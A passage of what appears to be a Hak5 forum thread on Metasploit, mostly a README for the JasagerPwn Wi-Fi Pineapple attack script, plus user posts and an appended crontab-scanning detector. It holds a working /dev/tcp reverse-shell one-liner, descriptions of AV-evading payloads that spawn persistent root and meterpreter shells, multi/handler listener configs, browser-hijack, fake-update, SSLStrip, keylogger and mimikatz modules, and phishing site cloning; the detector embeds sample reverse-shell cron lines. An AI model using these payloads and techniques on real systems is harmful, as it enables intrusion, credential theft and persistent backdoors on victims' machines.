      from /var/lib/gems/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/inflector/methods.rb:263:in `block in constantize'
      from /var/lib/gems/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/inflector/methods.rb:259:in `each'
      from /var/lib/gems/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/inflector/methods.rb:259:in `inject'
      from /var/lib/gems/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/inflector/methods.rb:259:in `constantize'
      from /var/lib/gems/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/core_ext/string/inflections.rb:66:in `constantize'
      from /opt/metasploit-framework/lib/metasploit/framework/command/base.rb:73:in `parsed_options_class'
      from /opt/metasploit-framework/lib/metasploit/framework/command/base.rb:69:in `parsed_options'
      from /opt/metasploit-framework/lib/metasploit/framework/command/base.rb:47:in `require_environment!'
      from /opt/metasploit-framework/lib/metasploit/framework/command/base.rb:81:in `start'
      from /usr/local/bin/msfconsole:48:in `<main>'
      Please help!!! I use Linux Mint 32-bit.
  20. Not totally sure what I'm doing. I started a reverse shell on my Ubuntu machine:
      0<&96-;exec 96<>/dev/tcp/192.168.1.4/2222;sh <&96 >&96 2>&96
      I get a file descriptor error when I run the command, but it opens a shell and I can interact with the target system (Ubuntu 16.04 Desktop). When I use cron_persistence from Armitage it seems to work fine. When I reboot the target it just black-screens and never runs the desktop. It's funny: I had been hacked running Ubuntu about a week ago, and I figured that the attacker had intentionally PDOSed my system. It was probably accidental. Anybody have any idea what's going on here? What am I doing wrong with the shell, and what do I do to fix the issue on the target machine?
  21. I'm in Metasploit and I did a db_nmap -O 192.168.**** to scan the OS version on a computer that's in my network and it came out and said that it was a Windows 7 machine however I am running Windows 10 on it. What do?
  22. Venom .dll vector (WinRAR/SFX compressed + fast_migrate.rc), by Spirit. Hello Hak5 members, actually I am new here and I love the Hak5 show. I am also a YouTuber and I would love to share my tutorials here. So if you don't know me, let me introduce myself: I'm Spirit, a 15-year-old YouTuber, and today I'm here to tell you about the malicious ".dll vector" to exploit Windows OSes. In this tutorial we will compress two files (our payload) into one .exe executable file with SFX, and we will also use fast_migrate to migrate our process to wininit.exe. So in this tutorial our attacker machine is BackBox (which is using Venom, the shellcode generator), the victim is Windows 7, and the framework we will use is Metasploit. So, if you like my tutorial then please subscribe/like/share my channel.
      ------------------------------------------------------------------------------------------------------------
      This tutorial is for educational purposes only. I'll not be responsible for any harm.
      ------------------------------------------------------------------------------------------------------------
      Please subscribe to my channel: www.youtube.com/c/Pentestingwithspirit && please like our Facebook page also: www.facebook.com/Pentestingwithspirit. Follow me on Twitter: @spirit3113
  23. Hey guys, I have some issues regarding my ISP. It's set up as carrier-grade NAT and it blocks all incoming port requests, so I was wondering if there is a way around that to obtain a public IP address so that my payload can connect back to my system through the WAN. If VPN is the only option, then are there any free services which support port forwarding?
  24. Is it possible to exploit a PC from Kali Linux without running the exe (file produced by msfvenom) on the victim's PC, using Meterpreter?
  25. Disclaimer: This script is intended for LEGAL purposes ONLY. By downloading the following material you agree that the intended use of the previously mentioned is for LEGAL and NON-MALICIOUS purposes ONLY. This means that while gaining client-side exploits, you have the correct documentation and permissions to do so in accordance with all US and international laws and regulations. Neither I nor any associates at Hak5 condone misuse of this code or its features.

Responsibility Disclosure: Hak5 has no affiliation with this code base. This code is not reviewed or verified by Hak5; therefore they do not take any responsibility for any of this code and its functionality. If you are paranoid (good!), then look over the code yourself to be safe.

Description
This script is intended to increase attack vector consistency and stability by automating the process. For penetration testers, the most important thing is having a stable and well-prepared attack vector, because you only get one chance. This script provides exactly that: a way to prepare and automate advanced and complex attack vectors in the lab, and then use them in the field.

Compatibility / Troubleshooting
Script Requirements: Pineapple [MK4 3.0.0] [MK5 1.0.0] - Debian-based Linux.
Tested Configuration: Pineapple MK5 1.0.0, Crunchbang Linux | Kali Linux
Battery - Pineapple (Router: wlan0 | ICS: wlan1) -> Alfa (DeAuth)
Attacker IPs: (2-man red team) - 172.16.42.2 172.16.42.3
Configuration Picture:

Setting up the Script:
Open up jasagerPwn in your favorite text editor. Look over all the variables in this file and read my comments; they should clearly explain what is what. Adjust the variables based on your pineapple setup. If anything is unclear, feel free to ask me and I can clarify. After you set up the script, connect to a stable internet connection and run the script - this will prompt you to install dependencies. This will take a few minutes; after that is completed you can connect to the pineapple's network (either via wireless or ethernet) and relaunch the script. That's it. You should be able to use the attack modules.

Dependencies Installation:
Dependencies will attempt to install automatically if they are not detected on your system. If this fails for you, please look at src/system_modules/dependencies.sh and just install them yourself. I've tested installation processes on Debian, Crunchbang, and Kali Linux. Infusion dependencies are also required for attack modules. Please refer to the list of attack modules below and their corresponding "Requirements".

Included Attack Vector Modules
browserPwn - Redirect LAN to Metasploit's auxiliary module browser_autopwn. This will be detected by AV. Victim Support: Mac OSX, Windows, Linux. Requirements: Metasploit, DNSSpoof Infusion
browserPwn iFrame - Inject an invisible iFrame into the victim's browsing session that points to Metasploit browser_autopwn. Victim Support: Mac OSX, Windows, Linux. Requirements: Metasploit, Strip-N-Inject Infusion
BeEF - Inject a BeEF JavaScript hook transparently into victims' browsing sessions. This is a form of man-in-the-browser and will not be detected by AV. Victim Support: Mac OSX, Windows, Linux. Requirements: Strip-N-Inject Infusion
Fake Update - Redirect LAN to a realistic fake update page with a [custom] payload download. Victim Support: Mac OSX, Windows. Requirements: Metasploit, DNSSpoof Infusion
Click Jacking - Hijack the entire DOM with an injected <div>. No matter where you click, it downloads a payload. Victim Support: Mac OSX, Windows. Requirements: Metasploit, Strip-N-Inject Infusion
Java Applet Injection - Transparently injects an OS-agnostic Java applet into the victim's browsing session. Victim Support: Mac OSX, Windows, Linux. Requirements: Metasploit, Strip-N-Inject Infusion
Java Applet Redirect - Redirects users to a Java page with an OS-agnostic Java applet payload. Victim Support: Mac OSX, Windows, Linux. Requirements: Metasploit, DNSSpoof Infusion
SSLStrip - Remove SSL from the victim's connections and sniff credentials. Victim Support: Mac OSX, Windows, Linux. Requirements: SSLStrip Infusion
Aireplay-ng [local] - DoS APs and try to make them join yours via a custom aireplay-ng script on the attacker machine. This script will run aireplay-ng against the AP broadcast; note that this works best if you are closer to the AP than the client.
MDK3 [local] - Deauths nearby clients from their APs and tries to make them join yours via MDK3 from the attacker machine. This script will run MDK3 to deauthenticate clients from an AP directly; note that this works best if you are close to the clients. As a result, this will have slightly better average range effectiveness.

Included Payloads (w/ Source & Documentation)
I have included some of my most successful and efficient payloads for your use. One for Mac OSX, and one for Windows - both will completely bypass signature-based anti-virus and most behavioral HIPS as well.

Apple_MacOSX_Update.pkg
Description: This is 4 lines of BASH stuck in an Apple postinstall script. No signature AV can ever detect this because it uses system commands and contains no binaries in the package. This will spawn 2 root shells to the following addresses:
    172.16.42.2 6446
    172.16.42.3 6446
Persistence: It will also add a persistent backdoor that will spawn these 2 every 3 minutes (sudo crontab -l)
Metasploit Listener:
    use exploit/multi/handler
    set PAYLOAD generic/shell_reverse_tcp
    set LHOST 0.0.0.0
    set LPORT 6446
    set ExitOnSession false
    set AutoRunScript ""
    exploit -j

powershell-https.exe
Description: This is an implementation of "Invoke-Shellcode" from Matthew Graeber's PowerSploit modules. It was stripped down, then minified and implemented into a standalone Python script, then compiled into an executable. It is not detected at the time of this writing. If the signature becomes detected, just make a new one. This will spawn 2 meterpreter shells to the following addresses:
    172.16.42.2 587
    172.16.42.3 587
Persistence: It will also add a persistent backdoor to Windows that will spawn these 2 shells every 3 minutes (schtasks /query /tn winupdate)
Metasploit Listener:
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_https
    set LHOST 0.0.0.0
    set LPORT 587
    set SessionCommunicationTimeout 0
    set ExitOnSession false
    set EXITFUNC process
    set AutoRunScript ""
    exploit -j

shellcode-tcp.exe
Description: This is a Windows meterpreter shell that was encoded into base64, embedded into a Python script that performs basic shellcode execution, and then compiled into an executable. It is not detected at the time of this writing. If the signature becomes detected, just make a new one with some random data in it. This will spawn 2 meterpreter shells to the following addresses:
    172.16.42.2 587
    172.16.42.3 587
Persistence: It will also add a persistent backdoor to Windows that will spawn these 2 shells every 3 minutes (schtasks /query /tn winupdate)
Metasploit Listener:
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 0.0.0.0
    set LPORT 587
    set ExitOnSession false
    set EXITFUNC thread
    set AutoRunScript "migrate -f -k"
    exploit -j

Included Resources
I have included a few resources that I find useful on pentests with the pineapple.
Metasploit Scripts: These are resource scripts that can be executed from msfconsole or in meterpreter. They create a nice way to automate post-exploitation at your fingertips. In order to run them use "resource resources/metaspoit_scripts/file_collector.rc".
file_collector.rc: Automatically search for documents on the system and download them.
enum_app_data.rc: Enumerate passwords and other data from browsers, PuTTY, etc.
keylog_recorder.rc: Start a keylogger that will poll and automatically collect keystrokes. You can use this and then CTRL+Z to background the session.
mimikatz.rc: Dump cleartext passwords from memory. Hashes are great, but why deal with cracking when they are sitting in memory in clear text?
payload_inject.rc: Inject a meterpreter session into explorer.exe. This is like "duplicate" but you can send it to your red team and not ever drop a binary on the system.
listeners.rc: This is useful for the other members of the red team not running JasagerPwn. They can just "msfconsole -r listeners.rc" and be ready to receive shells.
web_clone.sh: This is a simple wget command that I love to use to clone websites for phishing. It will put everything into a single index.html file. Note: If you're performing a MITM attack then you need to download all the resources that are hot-linked in index.html and then modify them to local, relative paths. This can be tedious but is what I have used to do every template in JasagerPwn.
airdrop-ng: This was an airdrop-ng attack module that I made before MDK3. I think MDK3 works better so I took it out and plopped it here.

Developing Attack Modules
This script was created in a modular architecture, allowing for relatively simple expansion of attack vectors. Use the "attack_module_example.sh" located in the resources directory for an example reference. There are just a few requirements when developing the modules:
- If you're making a local de-authentication module, use "deauth" or "dos" in the description string.
- You must have a "start_myname" and "stop_myname" function in that format (myname is arbitrary).
- You must have unique "title", "description", and "bindings" variables.
- I recommend editing the cleanup() function in src/system_modules/utility.sh to clean up after your module.
Module Submission: If you develop an attack module that you would like to have added into JasagerPwn, that is great! Just let me know and send me the code. If it's a good idea, I'll code review it and add it into the script.

Questions / Problems
Google Code: https://code.google.com/p/jasagerpwn-reborn/
Bug Submission: https://code.google.com/p/jasagerpwn-reborn/issues/entry
Changelog: https://code.google.com/p/jasagerpwn-reborn/source/list
Questions: Feel free to ask here or in IRC (irc.hak5.org #pineapple).

Download / Update
Download via Subversion (sudo apt-get install subversion):
    svn checkout http://jasagerpwn-reborn.googlecode.com/svn/trunk/ jasagerPwn-Reborn
Update Script to Latest Revision:
    ./jasagerPwn -u
Enjoy!
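Added example, not part of JasagerPwn or of either post: a defender-side check for the cron persistence that post 20 sets up with Armitage's cron_persistence and that post 25 describes for Apple_MacOSX_Update.pkg (a root crontab entry that respawns /dev/tcp reverse shells every 3 minutes, visible with sudo crontab -l). The crontab text below is constructed for the demo, and the indicator regex is a hypothetical starting point rather than anything the page provides; on a real host, feed the output of sudo crontab -l (and the files under /etc/cron.d) to the functions instead.

```shell
#!/bin/sh
# Added example (not part of JasagerPwn or the posts above): scan crontab text
# for the reverse-shell persistence pattern described on this page.
# SAMPLE_CRONTAB is constructed for the demo; replace it with `sudo crontab -l`.

SAMPLE_CRONTAB='# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update >/dev/null 2>&1
*/3 * * * * /bin/bash -c "exec 5<>/dev/tcp/172.16.42.2/6446;sh <&5 >&5 2>&5"
*/3 * * * * /bin/bash -c "exec 5<>/dev/tcp/172.16.42.3/6446;sh <&5 >&5 2>&5"
*/5 * * * * nc -e /bin/sh 10.0.0.5 4444
30 6 * * 1 /usr/local/bin/backup.sh'

# Indicators (hypothetical list, tune for your fleet): a raw TCP/UDP socket
# opened from the shell, netcat with command execution, an interactive bash,
# or the redirection idiom that wires a shell's stdin/stdout to a descriptor.
SUSPICIOUS_RE='/dev/tcp/|/dev/udp/|nc(at)? +(-e|-c)|bash +-i|sh +<&[0-9]+ *>&[0-9]+'

# Print every non-comment crontab line that matches an indicator.
# $1: crontab text
find_suspicious_cron() {
    printf '%s\n' "$1" | grep -v '^[[:space:]]*#' | grep -E "$SUSPICIOUS_RE"
}

# Number of matching lines (0 when clean); handy for a monitoring check.
count_suspicious_cron() {
    n=$(find_suspicious_cron "$1" | wc -l)
    echo "$n" | tr -d ' '
}

# High-frequency jobs (*/N in the minute field) are flagged separately: a job
# that fires every few minutes is rare for maintenance and typical of a
# beacon that respawns shells after they are killed.
find_frequent_cron() {
    printf '%s\n' "$1" | grep -v '^[[:space:]]*#' | grep -E '^\*/[0-9]+ '
}

if [ "${1:-}" = "--demo" ]; then
    echo "Suspicious entries:"
    find_suspicious_cron "$SAMPLE_CRONTAB"
    echo "High-frequency entries:"
    find_frequent_cron "$SAMPLE_CRONTAB"
fi
```

Run it with --demo to see the three planted entries; the two /dev/tcp lines and the nc -e line match the indicator set, and all three also show up as every-few-minutes jobs. Matching on the respawn interval as well as on the command text catches variants that swap the shell trick for a dropped binary, which is why the two checks are kept separate.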